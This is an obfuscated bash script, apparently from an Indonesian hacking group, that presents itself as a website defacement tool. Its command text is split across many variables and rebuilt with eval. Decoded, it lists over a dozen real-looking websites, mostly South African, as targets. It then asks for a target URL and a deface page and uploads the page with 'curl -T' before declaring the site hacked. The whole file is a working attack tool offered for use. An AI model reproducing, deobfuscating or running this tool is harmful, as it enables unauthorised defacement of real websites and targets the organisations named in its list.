# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#                     [>] CodeByFake                        #
#    _____ _    _  _______    ____    _    _   _ ____       #
#   |  ___/ \  | |/ / ____|  / ___|  / \  | \ | / ___|      #
#   | |_ / _ \ | ' /|  _|   | |  _  / _ \ |  \| \___ \      #
#   |  _/ ___ \| . \| |___  | |_| |/ ___ \| |\  |___) |     #
#   |_|/_/   \_\_|\_\_____|  \____/_/   \_\_| \_|____       #
#                       AUTHOR :FAKE                        #
#            Github : https://github.com/BHC-FAKE           #
#          H A Y O M A U N G A P A I N K A M P A N K        #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
z="
";hCz='jorm';EDz='ks.c';mCz='rati';DBz='CE W';Tz='cy='\''';LDz='ce D';xBz='at';jDz='$sc ';bBz='HC-F';oz='n We';fDz='curl';mz=' Kum';oBz='n Ng';iDz='ard/';vBz=' Dlo';bDz='a Sc';YCz='yweb';VBz='b : ';pDz='rhac';eBz=' " S';DDz='paru';JDz='gan ';gDz=' -T ';yz='" | ';HBz='" |A';DCz='alin';wBz='lolc';Fz='1m'\'' ';Vz='#cya';BCz='olca';IBz='utho';FCz=' Ini';oCz='.za"';nCz='a.co';qDz='k =>';wCz='dire';qz=' " |';cBz='AKE|';sz='cat';dz='#put';ICz='face';bCz='e.bi';Oz=''\''\03';TBz='" |g';qBz='unya';tDz='et/$';QDz='read';MBz='nsta';BBz='OLS ';YBz='gith';NDz='ar F';rBz=' Sc ';eDz='" sc';NCz='cont';vCz='tech';Lz='m'\'' #';ACz=' | l';KDz='Lupa';Hz='u';rz=' lol';XBz='s://';BDz='ound';Rz=' #pu';Az='clea';ADz='thef';SDz='"Mas';wz='--[+';aCz='esum';kCz='safe';PDz='r"';pBz='ga P';SCz='mamb';uBz='ikin';KCz=' $me';VDz='get ';Gz='#bir';OCz='sol.';TCz='abiz';EBz='EB  ';oDz='u"Te';sCz='infu';jBz='Dlu ';ZDz=';';GCz=' Tru';GBz='"';cCz='z"';az='ahh';yBz='date';xz=']"';tBz='ce B';lz='    ';Qz=';1m'\''';Wz='n';Mz='ijo';nz='pula';TDz='ukan';pz='b   ';aDz=' Nam';fCz='.co.';dDz=' =>>';Nz='pur=';bz='pu='\''';iCz='id.n';rCz='m"';Zz='#mer';IDz='"Jan';nBz='alia';WBz='http';HDz='om"';Dz='\033';UCz='.com';kDz='$tar';yCz='o.za';mBz='lo K';Iz='i='\''\';sBz='Defa';Xz='me='\''';RDz=' -p ';XCz='onke';hBz='Sc H';Yz='[31;';ZCz='my-r';LBz='" |I';Cz='bi='\''';tz=' $cy';gBz='Kan ';Bz='r';cz='[37;';lDz='get';RBz='cker';WCz='sonm';ez='ih';lCz='mode';uDz='sc';ZBz='ub.c';CDz='atio';RCz=' $pu';dCz='uzin';Pz='3[35';cDz='ript';vz='----';dBz=' ""';pCz='esfm';ODz='olde';VCz='crim';fz='ku='\''';tCz='ssio';Sz='rple';QCz='a"';Jz='033[';hDz='/sdc';kBz='!" |';JCz='"  |';FDz='whad';iBz='tml ';kz=' "  ';ABz='  TO';gCz='za"';NBz='gram';UBz='ithu';PBz='ctio';gz='[33;';SBz='s   ';UDz=' Tar';OBz=' : a';LCz='"htt';iz='ing';rDz=' " $';uCz='n.co';Uz='[36;';MDz='i Lu';QBz='n_ha';FBz='   |';WDz='=>> ';YDz='rget';CCz='t';sDz='targ';nDz='" $k';mDz='"{!}';HCz='s De';jCz='et"';aBz='om/B';uz='"[+]';lBz=' "Ka';fBz='iap ';JBz='r : ';CBz='DEFA';xCz='ct.c';MCz='p://';jz='echo';GDz='iz.c';PCz='co.z';XDz='" ta';qCz='l.co';KBz='Fake';eCz='gela';hz='#kun';Kz='32;1';ECz=' Web';Ez='[34;';
eval "$Az$Bz$z$Cz$Dz$Ez$Fz$Gz$Hz$z$Iz$Jz$Kz$Lz$Mz$z$Nz$Oz$Pz$Qz$Rz$Sz$z$Tz$Dz$Uz$Fz$Vz$Wz$z$Xz$Dz$Yz$Fz$Zz$az$z$bz$Dz$cz$Fz$dz$ez$z$fz$Dz$gz$Fz$hz$iz$z$jz$kz$lz$lz$lz$mz$nz$oz$pz$lz$lz$lz$qz$rz$sz$z$jz$tz$uz$vz$vz$vz$vz$vz$vz$vz$vz$wz$xz$z$jz$tz$yz$lz$lz$ABz$BBz$CBz$DBz$EBz$lz$FBz$GBz$z$jz$tz$HBz$IBz$JBz$KBz$lz$lz$lz$lz$lz$FBz$GBz$z$jz$tz$LBz$MBz$NBz$OBz$PBz$QBz$RBz$SBz$lz$FBz$GBz$z$jz$tz$TBz$UBz$VBz$WBz$XBz$YBz$ZBz$aBz$bBz$cBz$GBz$z$jz$tz$uz$vz$vz$vz$vz$vz$vz$vz$vz$wz$xz$z$jz$dBz$z$jz$eBz$fBz$gBz$hBz$iBz$jBz$kBz$rz$sz$z$jz$lBz$mBz$nBz$oBz$pBz$qBz$rBz$sBz$tBz$uBz$vBz$yz$wBz$xBz$z$yBz$ACz$BCz$CCz$z$jz$dBz$z$jz$eBz$DCz$ECz$FCz$GCz$HCz$ICz$JCz$rz$sz$z$jz$KCz$LCz$MCz$NCz$OCz$PCz$QCz$z$jz$RCz$LCz$MCz$SCz$TCz$UCz$GBz$z$jz$KCz$LCz$MCz$VCz$WCz$XCz$YCz$UCz$GBz$z$jz$RCz$LCz$MCz$ZCz$aCz$bCz$cCz$z$jz$KCz$LCz$MCz$dCz$eCz$fCz$gCz$z$jz$RCz$LCz$MCz$hCz$iCz$jCz$z$jz$KCz$LCz$MCz$kCz$lCz$fCz$gCz$z$jz$RCz$LCz$MCz$mCz$nCz$oCz$z$jz$KCz$LCz$MCz$pCz$qCz$rCz$z$jz$RCz$LCz$MCz$sCz$tCz$uCz$oCz$z$jz$KCz$LCz$MCz$vCz$wCz$xCz$yCz$GBz$z$jz$RCz$LCz$MCz$ADz$BDz$CDz$uCz$oCz$z$jz$KCz$LCz$MCz$DDz$EDz$yCz$GBz$z$jz$RCz$LCz$MCz$FDz$GDz$HDz$z$jz$dBz$z$jz$tz$IDz$JDz$KDz$rBz$sBz$LDz$MDz$NDz$ODz$PDz$z$QDz$RDz$SDz$TDz$ECz$UDz$VDz$WDz$XDz$YDz$ZDz$z$QDz$RDz$SDz$TDz$aDz$bDz$cDz$dDz$eDz$ZDz$z$fDz$gDz$hDz$iDz$jDz$kDz$lDz$z$jz$KCz$mDz$nDz$oDz$pDz$qDz$rDz$sDz$tDz$uDz"
